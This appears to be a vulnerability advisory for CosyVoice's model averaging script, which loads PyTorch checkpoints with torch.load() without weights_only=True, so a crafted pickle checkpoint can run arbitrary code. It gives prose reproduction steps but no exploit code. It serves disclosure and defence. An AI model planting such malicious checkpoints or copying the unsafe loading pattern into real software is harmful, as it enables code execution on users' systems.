CosyVoice Insecure Deserialization Vulnerability in Model Averaging Tool Allowing Arbitrary Code Execution

A vulnerability allowing insecure deserialization has been identified in CosyVoice, specifically in the average_model.py file used for model averaging. This issue arises because the script loads PyTorch checkpoint files (epoch_*.pt) using torch.load() without activating the weights_only=True security parameter. As a result, arbitrary Python objects can be deserialized via the pickle module. An attacker could exploit this vulnerability by supplying malicious checkpoint files. When the model averaging tool is used to process these files, it could lead to the execution of arbitrary code on the user's system.

Impact

Exploitation of this vulnerability allows for arbitrary code execution on the victim's system.

Reproduction

To reproduce this vulnerability, first, download a version of CosyVoice that includes the vulnerable commit. Then, create a directory and place a malicious PyTorch checkpoint file that exploits the insecure deserialization into this directory. Afterward, use the model averaging tool in average_model.py to average models from the directory containing the malicious checkpoint file. The tool will load the checkpoint file, leading to the execution of the embedded arbitrary code.